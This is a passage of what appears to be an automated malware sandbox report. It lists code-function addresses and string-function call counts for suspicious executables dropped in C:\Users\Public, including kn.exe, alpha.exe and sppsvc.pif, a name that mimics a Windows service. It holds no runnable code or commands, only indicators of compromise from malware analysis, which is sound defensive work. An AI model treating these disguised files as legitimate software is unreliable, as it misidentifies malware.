                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEABA4825_2_00007FF67DEABA48
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE63A4025_2_00007FF67DE63A40
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE31A1025_2_00007FF67DE31A10
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF3FC9025_2_00007FF67DF3FC90
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5F9B825_2_00007FF67DE5F9B8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB19AC25_2_00007FF67DEB19AC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBF99025_2_00007FF67DEBF990
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF2793825_2_00007FF67DF27938
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF2994C25_2_00007FF67DF2994C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6DD2025_2_00007FF67DE6DD20
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE45D0825_2_00007FF67DE45D08
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8BCE825_2_00007FF67DE8BCE8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE69CD025_2_00007FF67DE69CD0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF9CC025_2_00007FF67DEF9CC0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4BCA425_2_00007FF67DE4BCA4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB1C9025_2_00007FF67DEB1C90
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE83C6025_2_00007FF67DE83C60
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8FC3425_2_00007FF67DE8FC34
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6FC2025_2_00007FF67DE6FC20
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE3C1025_2_00007FF67DEE3C10
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9DBF025_2_00007FF67DE9DBF0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE59BC825_2_00007FF67DE59BC8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE35BA425_2_00007FF67DE35BA4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA1B8425_2_00007FF67DEA1B84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3FB8425_2_00007FF67DE3FB84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC7B7425_2_00007FF67DEC7B74
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEDFB5025_2_00007FF67DEDFB50
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBF6D825_2_00007FF67DEBF6D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE876B025_2_00007FF67DE876B0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEED6A025_2_00007FF67DEED6A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE767825_2_00007FF67DEE7678
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0566025_2_00007FF67DF05660
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5D66025_2_00007FF67DE5D660
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7564825_2_00007FF67DE75648
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3F61025_2_00007FF67DE3F610
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB95FC25_2_00007FF67DEB95FC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE955F025_2_00007FF67DE955F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6B58C25_2_00007FF67DE6B58C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6156C25_2_00007FF67DE6156C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0958025_2_00007FF67DF09580
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE858CC25_2_00007FF67DE858CC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9789025_2_00007FF67DE97890
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0387425_2_00007FF67DF03874
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECD85825_2_00007FF67DECD858
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC184C25_2_00007FF67DEC184C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1363825_2_00007FF67DF13638
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5183025_2_00007FF67DE51830
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE382025_2_00007FF67DEE3820
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4F80025_2_00007FF67DE4F800
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1767825_2_00007FF67DF17678
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9D7F025_2_00007FF67DE9D7F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE717D425_2_00007FF67DE717D4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA77C825_2_00007FF67DEA77C8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8979025_2_00007FF67DE89790
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4B78825_2_00007FF67DE4B788
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0D6DC25_2_00007FF67DF0D6DC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB376025_2_00007FF67DEB3760
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC531825_2_00007FF67DEC5318
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA92D825_2_00007FF67DEA92D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8D2C025_2_00007FF67DE8D2C0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1B3AC25_2_00007FF67DF1B3AC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE992C425_2_00007FF67DE992C4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3F2C025_2_00007FF67DE3F2C0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF233D025_2_00007FF67DF233D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF333D425_2_00007FF67DF333D4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE529025_2_00007FF67DEE5290
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE831E025_2_00007FF67DE831E0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE811C825_2_00007FF67DE811C8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF294A825_2_00007FF67DF294A8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4D1B825_2_00007FF67DE4D1B8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBF16825_2_00007FF67DEBF168
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAF52025_2_00007FF67DEAF520
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF014F025_2_00007FF67DF014F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE554A025_2_00007FF67DE554A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE949425_2_00007FF67DEE9494
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9747825_2_00007FF67DE97478
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEDD46025_2_00007FF67DEDD460
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3543825_2_00007FF67DE35438
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7D44025_2_00007FF67DE7D440
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7F43425_2_00007FF67DE7F434
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAD41025_2_00007FF67DEAD410
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE373F825_2_00007FF67DE373F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0D2B425_2_00007FF67DF0D2B4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5B36C25_2_00007FF67DE5B36C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6734025_2_00007FF67DE67340
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE58F1C25_2_00007FF67DE58F1C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE36EF425_2_00007FF67DE36EF4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6EED425_2_00007FF67DE6EED4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5EDA425_2_00007FF67DE5EDA4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA6D7C25_2_00007FF67DEA6D7C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF511C25_2_00007FF67DEF511C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF12D6C25_2_00007FF67DF12D6C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4B09C25_2_00007FF67DE4B09C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8D09425_2_00007FF67DE8D094
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7107C25_2_00007FF67DE7107C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3103025_2_00007FF67DE31030
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF14E5825_2_00007FF67DF14E58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF18EAC25_2_00007FF67DF18EAC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED4F9425_2_00007FF67DED4F94
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE64F9025_2_00007FF67DE64F90
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE84B3025_2_00007FF67DE84B30
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB6A8425_2_00007FF67DEB6A84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBEA7C25_2_00007FF67DEBEA7C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF04A4025_2_00007FF67DF04A40
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF08C5825_2_00007FF67DF08C58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBAA0025_2_00007FF67DEBAA00
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9E9F025_2_00007FF67DE9E9F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE909EC25_2_00007FF67DE909EC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF3CC8C25_2_00007FF67DF3CC8C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8899025_2_00007FF67DE88990
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9698425_2_00007FF67DE96984
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF28CF425_2_00007FF67DF28CF4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3294025_2_00007FF67DE32940
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE88D2C25_2_00007FF67DE88D2C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE92D1825_2_00007FF67DE92D18
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8CD1025_2_00007FF67DE8CD10
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC2CF825_2_00007FF67DEC2CF8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE48D0025_2_00007FF67DE48D00
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECCCA825_2_00007FF67DECCCA8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEACC8025_2_00007FF67DEACC80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0A9F025_2_00007FF67DF0A9F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE80C2825_2_00007FF67DE80C28
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3AC0825_2_00007FF67DE3AC08
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF24A5825_2_00007FF67DF24A58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1AA5825_2_00007FF67DF1AA58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7CBFC25_2_00007FF67DE7CBFC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA8BD425_2_00007FF67DEA8BD4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE6B9425_2_00007FF67DEE6B94
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE54B6825_2_00007FF67DE54B68
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF2675025_2_00007FF67DF26750
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAC6F825_2_00007FF67DEAC6F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9C6D025_2_00007FF67DE9C6D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9863025_2_00007FF67DE98630
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFC63025_2_00007FF67DEFC630
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF2285425_2_00007FF67DF22854
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE405E025_2_00007FF67DE405E0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF148C425_2_00007FF67DF148C4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF108C825_2_00007FF67DF108C8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECE57C25_2_00007FF67DECE57C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8258025_2_00007FF67DE82580
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6857025_2_00007FF67DE68570
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9655C25_2_00007FF67DE9655C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0453825_2_00007FF67DF04538
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF285A825_2_00007FF67DF285A8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF385EC25_2_00007FF67DF385EC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBE84425_2_00007FF67DEBE844
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBC7F025_2_00007FF67DEBC7F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB27D025_2_00007FF67DEB27D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE07D025_2_00007FF67DEE07D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1234C25_2_00007FF67DF1234C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8E29C25_2_00007FF67DE8E29C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5227C25_2_00007FF67DE5227C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA628025_2_00007FF67DEA6280
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1E43025_2_00007FF67DF1E430
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF4842F25_2_00007FF67DF4842F
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF821C25_2_00007FF67DEF821C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBA1E825_2_00007FF67DEBA1E8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1049025_2_00007FF67DF10490
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8C1D025_2_00007FF67DE8C1D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF184D825_2_00007FF67DF184D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3817025_2_00007FF67DE38170
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5014025_2_00007FF67DE50140
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3C52025_2_00007FF67DE3C520
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBE4F025_2_00007FF67DEBE4F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE444E025_2_00007FF67DE444E0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA24D425_2_00007FF67DEA24D4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE764A825_2_00007FF67DE764A8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC848825_2_00007FF67DEC8488
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8848425_2_00007FF67DE88484
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF441F825_2_00007FF67DF441F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAA45025_2_00007FF67DEAA450
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAC45025_2_00007FF67DEAC450
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3A42425_2_00007FF67DE3A424
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB841425_2_00007FF67DEB8414
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5441025_2_00007FF67DE54410
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1427425_2_00007FF67DF14274
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC43D025_2_00007FF67DEC43D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9039825_2_00007FF67DE90398
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7E3A025_2_00007FF67DE7E3A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC637425_2_00007FF67DEC6374
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028B835928_2_028B8359
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028920C428_2_028920C4
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA0DB6228_2_1BA0DB62
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA4332B28_2_1BA4332B
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA2E2FB28_2_1BA2E2FB
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA361F028_2_1BA361F0
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA2394628_2_1BA23946
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA278FE28_2_1BA278FE
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA2E0CC28_2_1BA2E0CC
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA26FEA28_2_1BA26FEA
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA2876228_2_1BA28762
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA2DE9D28_2_1BA2DE9D
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA25E5E28_2_1BA25E5E
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA2E55828_2_1BA2E558
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA274E628_2_1BA274E6
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BCAA5429_2_00007FF789BCAA54
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC8DF829_2_00007FF789BC8DF8
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD555429_2_00007FF789BD5554
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD785429_2_00007FF789BD7854
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD37D829_2_00007FF789BD37D8
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC341029_2_00007FF789BC3410
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC6EE429_2_00007FF789BC6EE4
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BE7F0029_2_00007FF789BE7F00
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD0A6C29_2_00007FF789BD0A6C
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BCE68029_2_00007FF789BCE680
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BEEE8829_2_00007FF789BEEE88
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD422429_2_00007FF789BD4224
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC222029_2_00007FF789BC2220
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC4A3029_2_00007FF789BC4A30
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BEAA3029_2_00007FF789BEAA30
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC524029_2_00007FF789BC5240
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC765029_2_00007FF789BC7650
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BCD25029_2_00007FF789BCD250
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC9E5029_2_00007FF789BC9E50
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BCCE1029_2_00007FF789BCCE10
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC81D429_2_00007FF789BC81D4
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BED9D029_2_00007FF789BED9D0
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC7D3029_2_00007FF789BC7D30
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BF153829_2_00007FF789BF1538
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BCB0D829_2_00007FF789BCB0D8
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC851029_2_00007FF789BC8510
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD18D429_2_00007FF789BD18D4
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC188429_2_00007FF789BC1884
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC2C4829_2_00007FF789BC2C48
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BEAC4C29_2_00007FF789BEAC4C
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC6BE029_2_00007FF789BC6BE0
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BEAFBC29_2_00007FF789BEAFBC
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC5B7029_2_00007FF789BC5B70
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC3F9029_2_00007FF789BC3F90
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC372C29_2_00007FF789BC372C
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC9B5029_2_00007FF789BC9B50
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_029A20C436_2_029A20C4
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210B415936_2_210B4159
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2109816836_2_21098168
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210A61F036_2_210A61F0
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2109E0CC36_2_2109E0CC
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2107F0FA36_2_2107F0FA
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210B332B36_2_210B332B
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2108739D36_2_2108739D
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2109E2FB36_2_2109E2FB
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2109E55836_2_2109E558
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210974E636_2_210974E6
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2109877036_2_21098770
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2109394636_2_21093946
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210AD9C936_2_210AD9C9
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210978FE36_2_210978FE
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2107DB6236_2_2107DB62
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21087BAF36_2_21087BAF
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21087A4636_2_21087A46
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21097D3336_2_21097D33
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21073FCA36_2_21073FCA
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21096FEA36_2_21096FEA
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21086E0E36_2_21086E0E
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21095E5E36_2_21095E5E
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2109DE9D36_2_2109DE9D
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: String function: 029A4668 appears 244 times
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: String function: 029A6604 appears 32 times
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: String function: 21062093 appears 50 times
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: String function: 029A4470 appears 67 times
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: String function: 029A47D0 appears 771 times
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: String function: 21094770 appears 41 times
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: String function: 029B7B60 appears 45 times
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: String function: 21061E65 appears 34 times
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: String function: 21094E10 appears 54 times
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: String function: 028947D0 appears 522 times
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: String function: 02896604 appears 33 times
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: String function: 02894668 appears 154 times
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: String function: 1BA24E10 appears 54 times
                    Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF789BD3448 appears 54 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67DEEABFC appears 818 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67DEF0D10 appears 181 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67DF464A6 appears 173 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67DECEB98 appears 93 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67DE3D1C8 appears 41 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67DEF7BAC appears 34 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67DE6BC9C appears 280 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67DF3F11C appears 37 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67DF3F1B8 appears 183 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67DEF7D70 appears 35 times
                    Source: C:\Users\Public\ger.exeCode function: String function: 00007FF65588D3D0 appears 56 times
